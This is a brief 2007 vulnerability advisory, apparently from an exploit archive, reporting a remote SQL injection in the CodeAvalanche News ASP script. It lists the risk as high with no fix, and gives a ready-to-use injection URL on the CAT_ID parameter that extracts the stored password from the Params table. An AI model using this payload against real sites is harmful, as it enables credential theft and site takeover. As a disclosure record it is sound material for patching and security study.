CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection Vulnerability

2007-02-15 00:00:00

#CodeAvalanche News SQL Injection#

Software: CodeAvalanche News

Download: http://www.aspindir.com/indir.asp?id=3315

Risk: High

Found by: beks

http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.